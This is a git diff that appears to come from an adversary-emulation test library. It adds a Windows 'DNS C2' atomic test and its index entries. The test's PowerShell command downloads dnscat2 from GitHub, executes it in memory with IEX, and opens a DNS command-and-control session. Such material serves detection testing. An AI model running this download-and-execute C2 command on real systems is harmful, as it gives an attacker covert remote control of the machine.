diff --git a/atomics/T1071/T1071.md b/atomics/T1071/T1071.md
index 1e3757e1..de7795ce 100644
--- a/atomics/T1071/T1071.md
+++ b/atomics/T1071/T1071.md
@@ -18,6 +18,8 @@ For connections that occur internally within an enclave (such as those between a
- [Atomic Test #6 - DNS Long Domain Query](#atomic-test-6---dns-long-domain-query)
+- [Atomic Test #7 - DNS C2](#atomic-test-7---dns-c2)
+
@@ -195,4 +197,34 @@ Set-Location $PathToAtomicsFolder
+
+
+
+## Atomic Test #7 - DNS C2
+This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command.
+The following blogs have more information.
+https://github.com/iagox86/dnscat2
+https://github.com/lukebaggett/dnscat2-powershell
+
+**Supported Platforms:** Windows
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| domain | Domain Name configured to use DNS Server where your C2 listener is running | string | example.com|
+| server_ip | IP address of DNS server where your C2 listener is running | string | 127.0.0.1|
+
+
+#### Attack Commands: Run with `powershell`!
+```
+IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
+Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
+```
+
+
+
+
+
+
diff --git a/atomics/index.md b/atomics/index.md
index 8bcc00f2..3942f639 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -983,6 +983,7 @@
- Atomic Test #4: DNS Large Query Volume [windows]
- Atomic Test #5: DNS Regular Beaconing [windows]
- Atomic Test #6: DNS Long Domain Query [windows]
+ - Atomic Test #7: DNS C2 [windows]
- [T1032 Standard Cryptographic Protocol](./T1032/T1032.md)
- Atomic Test #1: OpenSSL C2 [windows]
- [T1095 Standard Non-Application Layer Protocol](./T1095/T1095.md)
diff --git a/atomics/index.yaml b/atomics/index.yaml
index ff22d907..bdd003c0 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -27955,6 +27955,30 @@ command-and-control:
command: |
Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
+ - name: DNS C2
+ description: |
+ This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command.
+ The following blogs have more information.
+ https://github.com/iagox86/dnscat2
+ https://github.com/lukebaggett/dnscat2-powershell
+ supported_platforms:
+ - windows
+ input_arguments:
+ domain:
+ description: Domain Name configured to use DNS Server where your C2 listener
+ is running
+ type: string
+ default: example.com
+ server_ip:
+ description: IP address of DNS server where your C2 listener is running
+ type: string
+ default: 127.0.0.1
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |-
+ IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
+ Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
T1032:
technique:
x_mitre_data_sources:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index a26ff144..5b957c85 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -730,6 +730,7 @@
- Atomic Test #4: DNS Large Query Volume [windows]
- Atomic Test #5: DNS Regular Beaconing [windows]
- Atomic Test #6: DNS Long Domain Query [windows]
+ - Atomic Test #7: DNS C2 [windows]
- [T1032 Standard Cryptographic Protocol](./T1032/T1032.md)
- Atomic Test #1: OpenSSL C2 [windows]
- [T1095 Standard Non-Application Layer Protocol](./T1095/T1095.md)